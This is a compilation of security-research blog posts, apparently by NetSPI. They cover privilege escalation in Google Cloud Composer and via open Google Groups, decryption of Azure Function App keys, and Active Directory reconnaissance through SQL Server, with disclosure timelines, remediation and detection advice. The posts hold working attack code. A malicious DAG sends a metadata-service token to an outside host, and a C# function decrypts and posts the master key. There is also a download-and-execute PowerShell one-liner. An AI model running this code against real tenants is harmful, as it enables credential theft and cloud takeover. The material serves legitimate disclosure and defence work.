Filling up the DagBag: Privilege Escalation in Google Cloud Composer

Cloud Composer is a managed service in Google Cloud Platform that allows users to manage workflows. Cloud Composer is built on Apache Airflow and is integrated closely with multiple GCP services. One key component of the managed aspect of Cloud Composer is the use of Cloud Storage to support the environment’s data.  

Per GCP documentation: “When you create an environment, Cloud Composer creates a Cloud Storage bucket and associates the bucket with your environment… Cloud Composer synchronizes specific folders in your environment’s bucket to Airflow components that run in your environment.” 

This blog will walk through how an attacker can escalate privileges in Cloud Composer by targeting the environment’s dedicated Cloud Storage Bucket for command execution. We will also discuss the impact of using default configurations and how these can be leveraged by an attacker. 

TL;DR 

  • An attacker that has write access to the Cloud Composer environment’s dedicated bucket (pre-provisioned or gained through other means) can gain command execution in the Composer environment. This command execution can be leveraged to access the Composer environment’s attached service account. 
  • The “dags” folder in the Storage Bucket automatically syncs to Composer. A specifically crafted Python DAG can be created to gain command execution in the Composer pipeline. 
  • An attacker ONLY needs write access to the Storage Bucket (pre-provisioned or gained through other means). No permissions on the actual Composer service are needed. 
  • The Composer service uses the Default Compute Engine Service Account, which is granted Editor on the entire project by default. 
  • NetSPI reported this issue to Google VRP. This resulted in a ticket status of Intended Behavior. 

Environment Bucket and DAGs 

As mentioned before, Composer relies on Cloud Storage for dedicated environment data storage. Multiple folders are created for the environment in the bucket, including the “dags” folder. Apache Airflow workflows are made up of Directed Acyclic Graphs (DAGs). DAGs are defined in Python code and can perform tasks such as ingesting data or sending HTTP requests. These files are stored in the Storage bucket’s “dags” folder. 

Composer automatically syncs the contents of the “dags” folder to Airflow. This is significant, as anyone who has write access to this folder can write their own DAG, upload it to this folder, and have the DAG synced to the Airflow environment without ever having access to Composer or Airflow.  

An attacker with write access (pre-provisioned or gained through other means) could leverage the following attack path: 

  1. Create an externally available listening webserver. 
  2. Create a specifically crafted DAG file that is configured to run immediately upon pickup by the Airflow scheduler. The DAG file will query the metadata service for a Service Account token and send that to the externally available webserver. 
  3. Upload the DAG file to the “dags” folder in the Storage Bucket. The DAG file will automatically be synced into Airflow. 
  4. Wait for the DAG to be picked up by the scheduler and executed. This does NOT require any access to the Airflow UI and does not require manual triggering. The DAG will run automatically in a default configuration. 
  5. Monitor the listening webserver for a POST request with the Service Account access token. 
  6. Authenticate with the access token. 

Proof of Concept 

Assume a GCP project (cc-demo) has been created with all default settings. This includes enabling the Compute service and the Default Compute Engine Service Account that has Editor on the project.

The Cloud Composer service has also been enabled and an environment (composer-demo) with default settings has been created via the UI. Note that the environment uses the Default Compute Engine Service Account by default. 

A dedicated Cloud Storage bucket has also been created for the new Composer environment. All the documented Airflow folders have been automatically created. 

The attacker (demo-user) has write access to all buckets in the project, including the dedicated Composer bucket. 

An example Python DAG like the one below can be used to gain command execution in the Composer environment. There are a few important sections in the DAG to highlight: 

  • the start_date has been set to a day ago 
  • catchup is True 
  • the BashOperator has been used to query the metadata service for a token which is then sent outbound to a listening web server 

Note that this is just a single example of what could be done with write access.

"""netspi test""" 
import airflow 
from airflow import DAG 
from airflow.operators.bash_operator import BashOperator 
from datetime import timedelta 

default_args = { 
    'start_date': airflow.utils.dates.days_ago(1),  # backdated so the scheduler sees a missed run 
    'retries': 1, 
    'retry_delay': timedelta(minutes=1), 
    'depends_on_past': True, 
} 

dag = DAG( 
    'netspi_dag_test', 
    default_args=default_args, 
    description='netspi', 
    # schedule_interval=None, 
    max_active_runs=1, 
    catchup=True,  # backfill the missed interval as soon as the DAG is picked up 
    dagrun_timeout=timedelta(minutes=5)) 

# priority_weight has type int in Airflow DB, uses the maximum. 
t1 = BashOperator( 
    task_id='netspi_dag', 
    bash_command='ev=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H "Metadata-Flavor: Google");curl -X POST -H "Content-Type: application/json" -d "$ev" https://[REDACTED]/test', 
    dag=dag, 
    depends_on_past=False, 
    priority_weight=2**31 - 1, 
    do_xcom_push=False) 

The demo-user can then upload the example Python DAG file to the dags folder.
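A minimal sketch of the upload step using gsutil (the bucket name here is illustrative; actual Composer bucket names are environment-specific): 

gsutil cp netspi_dag_test.py gs://us-central1-composer-demo-1234-bucket/dags/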

The DAG file will eventually sync to Airflow, get picked up by the scheduler, and run automatically. A request will pop up in the web server logs or Burp Suite Pro’s Collaborator. 

The token can then be used with the gcloud cli or the REST APIs directly. 
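For example, the token can be passed as a bearer token directly to the REST APIs. A hedged sketch that lists Storage buckets in the project (the token value is a placeholder): 

curl -H "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b?project=cc-demo"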

Prevention and Remediation 

Google VRP classified this issue as Intended Behavior. Per Google documentation, IAM permissions for the environment's Cloud Storage bucket are the responsibility of the customer. This documentation was updated to more clearly outline the danger of gaining write access to this bucket. 

Cloud Composer's default behavior of assigning the Default Compute Engine Service Account (which is granted Editor on the project by default) has also been documented here. 

NetSPI recommends reviewing all pertinent Google documentation on securing Cloud Composer. Specifically for this attack vector: 

  • Include the services used to support Cloud Composer in the overall threat model, as the security of those services will affect Composer. 
  • Follow the principle of least privilege when granting permissions to Cloud Storage in a project that uses Cloud Composer. Review all identities that have write access to the environment’s bucket and remove any identities with excessive access. 
  • Follow the principle of least privilege when assigning a service account to Cloud Composer. Avoid using the Default Compute Engine Service Account due to its excessive permissions. 

Detection 

The following may be helpful for organizations that want to actively detect on the attack vector described. Note that these opportunities are meant to provide a starting point and may not work as written for every organization’s use case. 

Data Source: Cloud Composer Streaming Logs
Detection Strategy: Behavior
Detection Concept: Detect new Python files being created in the “dags” folder in the storage bucket. Alternatively, detect when a new DAG is synced from a bucket to a Composer environment using the gcs-syncd logs.
Detection Reasoning: A user that has write access to the bucket could gain command execution in the Composer environment via rogue DAG files.
Known Detection Consideration: New DAGs will be created as part of legitimate activity and exceptions may need to be added.
Example Instructions: 
Refer to https://cloud.google.com/composer/docs/concepts/logs#streaming. 

  1. Browse to Log Explorer 
  2. Enter the query below and substitute the appropriate values 
  3. Select “gcs-syncd”, “airflow-scheduler”, or “airflow-worker” to review the logs 
resource.type="cloud_composer_environment" 
resource.labels.location="<ENTER_LOCATION_HERE>" 
resource.labels.environment_name="<ENTER_COMPOSER_RESOURCE_NAME>" 

gcs-syncd example

airflow-worker example 

Google Bug Hunters VRP Timeline 

NetSPI worked with Google on coordinated disclosure. 

  • 07/22/2024 – Report submitted 
  • 07/23/2024 – Report triaged and assigned 
  • 07/25/2024 – Status changed to In Progress (Accepted) with type Bug 
  • 08/10/2024 – Status changed to Won’t Fix (Intended Behavior) 
  • 08/13/2024 – Google provides additional context 
  • 09/02/2024 – Coordinated Disclosure process begins 
  • 09/30/2024 – Coordinated Disclosure process ends 

Learn more about escalating privileges in Google Cloud: 
Escalating Privileges in Google Cloud via Open Groups 

Escalating Privileges in Google Cloud via Open Groups

Per GCP IAM documentation, Google Groups are valid principals for IAM policy bindings in Google Cloud. Google also recommends using Groups when granting roles in GCP, as opposed to users. Groups can include groups outside of organizations like devs@googlegroups.com or groups in an Organization like admins@yourorg.com. Google Groups can be managed via https://groups.google.com/ and optionally through the Google Cloud Console.

Google Groups can be configured with various access settings at both the specific group and the organization level. One important access setting is “Who can join group”. Most organizations will have anonymous internet access disabled by default, which leaves three common organization-level settings: Only invited users, Anyone in the organization can ask, and Anyone in the organization can join.

This blog will detail how an attacker can escalate their privileges in Google Cloud by leveraging weak group join settings for groups that have been granted roles in GCP. Opportunities for Hunting and Detection are provided towards the end of the blog.

TL;DR

  • A user that is a member of the organization can potentially escalate their privileges into Google Cloud if:
    • A Google Group has been specified as a principal member in an IAM policy AND
    • the Google Group has been configured with open access permissions that allow any member of the organization to join the group.
  • Google Groups created via the main Groups console can be granted permissions within Google Cloud IAM Policy, even when the group has been configured with “Entire organization – can join group” access settings.
  • There does not appear to be any explicit, default guardrails in place to prevent administrators from assigning roles in GCP to Groups with open join settings.
  • This was reported to Google as a potential Privilege Escalation vector via Bug Hunters VRP. The report resulted in a classification of Type “Bug” and a Status of “Won’t Fix (Intended Behavior)”.

Previous Research

Finding vulnerable Groups

As noted in the TL;DR, we need to find open groups that also have been granted roles in Google Cloud. This process is made a lot easier if you already have read access to list IAM Policy, so that you can target only the groups that actually have permissions. Without this extra information, you will be stuck with attempting to list and check every group.

From an offensive perspective, the main Google Groups console is probably the easiest way to quickly identify open groups. A member user, Developer Tools, and a little background research are all that is needed to get started.

Browsing to the Google Groups page with browser Dev Tools open shows requests related to a batchexecute endpoint.

Decoded URL
https://groups.google.com/u/2/_/GroupsFrontendUi/data/batchexecute?rpcids=rCA4W&source-path=/u/2/recent…

Decoded POST body
f.req=[[["rCA4W","[]",null,"generic"]]]…

Response body
)]}'

104
[["wrb.fr","rCA4W","[]",null,null,null,"generic"],…

Ryan Kovatch’s blog does a great job of explaining the format of the requests and responses for this endpoint. The main takeaway here is that we want to identify the particular rpcid that returns group settings information. This can be identified by browsing to the All Groups section and paginating through as many pages as possible to view every group in the organization. A batchexecute request containing the zx9ptd rpcid should be present for every group listed.

Decoded URL
https://groups.google.com/u/2/_/GroupsFrontendUi/data/batchexecute?rpcids=zx9ptd&source-path=/u/2/all-groups&…

Decoded POST body
f.req=[[["zx9ptd","[\"demo-open-join@thisisnotarealorg.com\"]",null,"generic"]]]…

Response body
)]}'

192
[["wrb.fr","zx9ptd","[[\"110157945035653151646\",\"demo-open-join@thisisnotarealorg.com\"],[true,false,true],0]",null,null,null,"generic"],…

This request looks promising and the rpcid can be looked up by doing a quick search in the Dev Tools console.

…
_.gBa = new _.Oe("zx9ptd",_.fu,_.hu,[{
    key: _.Cj,
    value: !0
}, {
    key: _.Ej,
    value: "/GroupsFrontendService.GetJoinPermissions"
}]);
…

Looking back at the responses for the zx9ptd request, the access settings of the Group can be determined by comparing an open group against a closed group. The open group contains the following highlighted string in its response. Searching for this string via the browser Developer Tools, after paging through the group list (for example, by searching for a common group keyword), makes it possible to identify open groups at scale.

Entire organization – can join group

…,\"demo-open-join@thisisnotarealorg.com\"],[true,false,true],0]"…

Entire organization – can ask to join group

…\"test1@thisisnotarealorg.com\"],[false,true,true],0]"…

Invited users – can join group

…\"test2@thisisnotarealorg.com\"],[false,false,true],0]"…

While extremely rudimentary, this method can work at scale when you have thousands of groups to review. Manual checks can also be done easily by checking for a Join icon when browsing through the list of groups. A group with open join permissions will show this Join option in the group list.
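As a rough illustration, assuming the boolean triple in the zx9ptd response encodes the join settings as observed above (the third flag was true in every observed response and its meaning is unconfirmed), a small helper could classify groups in bulk:

def classify_join_setting(flags):
    """Map the observed zx9ptd boolean triple to a join setting (assumption-based)."""
    can_join, can_ask, _unknown = flags
    if can_join:
        return "Entire organization - can join group"
    if can_ask:
        return "Entire organization - can ask to join group"
    return "Invited users - can join group"

# Example using the open group response shown above
print(classify_join_setting([True, False, True]))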

Escalating into Google Cloud

The following example assumes that the demo-user is a normal member organization user with no permissions in Google Cloud. This is confirmed by browsing to the Cloud Console and attempting to list Projects in the Project chooser.

The demo-open-join Group does have permissions in Google Cloud and has been previously configured with open join settings (see the last screenshot in the previous section). This group is a standard group created via the Groups UI and has been granted the Storage Admin Role on the entire prj-demo project in GCP.

The demo-user can join the demo-open-join group by clicking into the group’s settings and clicking on the “Join group” button. The normal member user has successfully joined the group.

The demo-user can then refresh their session to the Cloud Console after a few minutes and will see a new project. Digging further into the console, the user will also be able to see buckets. Since the Storage Admin role has been granted to the demo-open-join group, any user in this group inherits these permissions.

This is a very simple example, but it demonstrates the risk around groups with open join permissions when they are granted roles in Google Cloud. Not every scenario will be this straightforward and impact depends entirely on the role and the scope of the permissions granted to the group.

Prevention and Remediation

The best way to prevent accidental role grants to open join groups is to always validate the group’s access settings and members before making a role assignment. NetSPI was able to grant roles in GCP to a group with open join permissions (“Entire organization – can join group”). The test Organization was using default configurations and there were no explicit guardrails in place that prevented this. Google does support Security Groups, which have some additional protections in place, but also allow open join permissions.

Google does provide some Group specific guardrails around Group visibility. Hiding certain groups from general members could be an effective way to prevent users from enumerating sensitive groups.

General recommendations for Groups can be found here. Google Cloud also provides additional features for controlling IAM permissions via IAM Deny policies that may be useful for your organization.

While this issue has been classified as Intended Behavior, there is a risk for customer misconfiguration. Google’s Security Command Center in GCP has a check (Open group IAM member) that can find these scenarios. Google’s recommendations for remediating the issue can be found here.

Hunting and Detection

The following may be helpful to organizations that want to actively hunt for or detect open join groups. Note that these opportunities are meant to provide a starting point and may not work as written for every organization's use case. At a high level, the detection below will alert on existing open groups in the environment, while the hunting opportunities offer a broader approach using IAM and Group metadata.

Detection Opportunity #1

Data Source: IAM Policy bindings creation
Detection Strategy: Behavior
Detection Concept: Detect when an IAM policy is created where the principal is an open group. The finding OPEN_GROUP_IAM_MEMBER exists in Security Command Center for this detection opportunity.

state="ACTIVE" AND NOT mute="MUTED" AND category="OPEN_GROUP_IAM_MEMBER"

Detection Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.
Known Detection Consideration: Detection relies on the cadence of scanning in Security Command Center.

Hunting Opportunity #1 – Identify permissions for any groups in GCP

Data Source: IAM Policy Metadata
Detection Strategy: Behavior
Hunting Concept: Use Asset Inventory to review all IAM Policies where the principal is a group. This will include ALL groups, so the data should be cross-referenced with Hunting Opportunity #2.
Gcloud CLI command

gcloud asset search-all-iam-policies \
    --scope='...' \
    --query='memberTypes:group'

Console command

Hunting Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.

Hunting Opportunity #2 – Identify any open groups

Data Source: Group Metadata
Detection Strategy: Behavior
Hunting Concept: Review all groups that have open join access, even those that are not assigned permissions in GCP.

  1. Go to the Groups dashboard in the Admin console.
  2. Click the Manage Columns option.
  3. Add a new column “Who can join the group”.
  4. Click Save.
  5. Review this column for the setting “Anyone in the organization can join”.

Hunting Reasoning: A member user of the Organization could join the open group and inherit any permissions granted to the group.

Coordinated Disclosure Timeline

NetSPI worked with Google on coordinated disclosure.

  • 12/11/2023 – Report submitted
  • 12/11/2023 – Report triaged and assigned
  • 12/12/2023 – Status changed to Won’t Fix (Infeasible)
  • 12/14/2023 – Status changed to Won’t Fix (Intended Behavior)
  • 12/28/2023 – Status changed to Assigned (reopened)
  • 01/03/2024 – Status changed to Won’t Fix (Intended Behavior)
  • 01/16/2024 – Status changed to In Progress (Accepted) (reopened). Type changed to Bug.
  • 01/18/2024 – Status changed to Won’t Fix (Intended Behavior)
  • 01/21/2024 – Coordinated Disclosure process begins
  • 03/15/2024 – Coordinated Disclosure process completed

Thanks to Karl Fosaaen, Nick Lynch, and Ben Lister for their review.

What the Function: Decrypting Azure Function App Keys

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TL;DR 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via their corresponding Storage Accounts. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code

Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the “encrypted” parameter to false to inject their own cleartext function keys into the Function App (see Rogier Dijkman's research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically places each function in its own folder under the wwwroot directory. 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 
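A rough sketch of that layout (folder and file names are illustrative, assuming a C# script app):

site/wwwroot/host.json
site/wwwroot/HttpTrigger1/function.json
site/wwwroot/HttpTrigger1/run.csx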

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{\"name\":\"{keyname}\", \"value\":\"{ikey.Value}\"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the Function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally: access to the decryption key.

The code makes multiple references to the location of the default keys.

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux-based containers use AzureWebEncryptionKey, while Windows uses MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App trigger code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. The example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 
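As a hedged illustration, a PowerShell HTTP trigger (run.ps1) could return the variable directly; the binding names below assume the default PowerShell Function template:

using namespace System.Net
param($Request, $TriggerMetadata)

# Return the decryption key environment variable (Windows worker assumed)
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = $env:MACHINEKEY_DecryptionKey
})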

The local decryption can be done once the encrypted key data and the decryption key are obtained. After pulling down the GitHub repo and getting it set up in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 
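With the decrypted master key, the administrative endpoints can be queried. A hedged example that lists the functions in the app (the host name from the earlier host.json and the key are placeholders):

curl -H "x-functions-key: <DECRYPTED_MASTER_KEY>" https://thisisafakefunctionappprobably.azurewebsites.net/admin/functions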

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  2. Rotating Shared Access Keys. 
  3. Limiting the creation of privileged, long lasting SAS tokens. 
  4. Use the principle of least privilege. Only grant the least privileges necessary for narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list keys permissions!). 
  5. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  6. Avoid using shared Storage Accounts for multiple Functions. 
  7. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

  • 02/08/2023 – Initial report created 
  • 02/13/2023 – Case closed as expected and documented behavior 
  • 03/08/2023 – Second report created 
  • 04/25/2023 – MSRC confirms original assessment as expected and documented behavior 
  • 08/12/2023 – DEF CON Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

Dumping Active Directory Domain Info – with PowerUpSQL!

This blog walks through how to use the OLE DB ADSI provider in SQL Server to query Active Directory for information.  I’ll also share a number of new PowerUpSQL functions that can be used for automating common AD recon activities through SQL Server. Hopefully this will be useful to red teamers, pentesters, and database enthusiasts. Thanks to Scott Sutherland (@_nullbind) for his work on both the AD recon functions and PowerUpSQL!

The T-SQL

The T-SQL below shows how the ADSI provider is used with OPENQUERY and OPENROWSET to query for Active Directory information. First, a SQL Server link needs to be created for the ADSI provider. A link is created with the name “ADSI”.

-- Create SQL Server link to ADSI
IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI') = 0
EXEC master.dbo.sp_addlinkedserver @server = N'ADSI',
@srvproduct=N'Active Directory Service Interfaces',
@provider=N'ADSDSOObject',
@datasrc=N'adsdatasource'
ELSE
SELECT 'The target SQL Server link already exists.'

If using OPENQUERY, associate the link with the current authentication context. A username and password can also be specified here. Then run the example query.

Note: The LDAP “path” should be set to the target domain.

-- Define authentication context - OpenQuery
EXEC sp_addlinkedsrvlogin
@rmtsrvname=N'ADSI',
@useself=N'True',
@locallogin=NULL,
@rmtuser=NULL,
@rmtpassword=NULL
GO
-- Use openquery
SELECT *
FROM OPENQUERY([ADSI],'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')

If using OPENROWSET, enable ad hoc queries. Then run the example query with a specified username and password or default authentication.

Note: The LDAP “path” should be set to the target domain.

-- Enable 'Show Advanced Options'
EXEC sp_configure 'Show Advanced Options', 1
RECONFIGURE
GO

-- Enable 'Ad Hoc Distributed Queries'
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
RECONFIGURE
GO

-- Run with openrowset
SELECT *
FROM OPENROWSET('ADSDSOOBJECT','adsdatasource',
'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')

Loading PowerUpSQL

PowerUpSQL can be loaded quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Newly Added Active Directory Recon Functions

Now that you have PowerUpSQL loaded, you can use the new commands to execute queries against the domain.  However, please be aware that all commands require sysadmin privileges.

  • Get-SQLDomainAccountPolicy: Provides the domain account policy for the SQL Server's domain. 
  • Get-SQLDomainComputer: Provides a list of the domain computers on the SQL Server's domain. 
  • Get-SQLDomainController: Provides a list of the domain controllers on the SQL Server's domain. 
  • Get-SQLDomainExploitableSystem: Provides a list of the potentially exploitable computers on the SQL Server's domain based on Operating System version information. 
  • Get-SQLDomainGroup: Provides a list of the domain groups on the SQL Server's domain. 
  • Get-SQLDomainGroupMember: Provides a list of the domain group members on the SQL Server's domain. 
  • Get-SQLDomainObject: Can be used to execute arbitrary LDAP queries on the SQL Server's domain. 
  • Get-SQLDomainOu: Provides a list of the organizational units on the SQL Server's domain. 
  • Get-SQLDomainPasswordsLAPS: Provides a list of the local administrator passwords on the SQL Server's domain. This typically requires Domain Admin privileges. 
  • Get-SQLDomainSite: Provides a list of sites. 
  • Get-SQLDomainSubnet: Provides a list of subnets. 
  • Get-SQLDomainTrust: Provides a list of domain trusts. 
  • Get-SQLDomainUser: Provides a list of the domain users on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState Disabled: Provides a list of the disabled domain users on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState Enabled: Provides a list of the enabled domain users on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState Locked: Provides a list of the locked domain users on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState PreAuthNotRequired: Provides a list of the domain users that do not require Kerberos preauthentication on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState PwLastSet 90: Lists users that have not changed their password in the last 90 days. Any number of days can be provided. 
  • Get-SQLDomainUser -UserState PwNeverExpires: Provides a list of the domain users whose passwords never expire on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState PwNotRequired: Provides a list of the domain users with the PASSWD_NOTREQD flag set on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState PwStoredRevEnc: Provides a list of the domain users storing their password using reversible encryption on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState SmartCardRequired: Provides a list of the domain users that require a smart card for interactive login on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState TrustedForDelegation: Provides a list of the domain users trusted for delegation on the SQL Server's domain. 
  • Get-SQLDomainUser -UserState TrustedToAuthForDelegation: Provides a list of the domain users trusted to authenticate for delegation on the SQL Server's domain. 

Dumping Domain Users Examples

This example shows how to gather a list of enabled domain users using a Linked Server via OPENQUERY.

Get-SQLDomainUser -Instance MSSQLSRV04\SQLSERVER2014 -Verbose -UserState Enabled

Alternatively, the command can be run using ad hoc queries via OPENROWSET as shown below. It's nothing crazy, but it does provide a few options for avoiding detection if the DBAs are auditing for linked server creation, but not ad hoc queries, in the target environment. 

Get-SQLDomainUser -Instance MSSQLSRV04\SQLSERVER2014 -Verbose -UserState Enabled -UseAdHoc

The functions also support providing an alternative SQL Server login for authenticating to the SQL Server and an alternative Windows credential for configuring server links.  More command examples can be found here.
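As a hedged example of the alternative authentication options (the credential values are placeholders; see the PowerUpSQL wiki for exact parameter usage):

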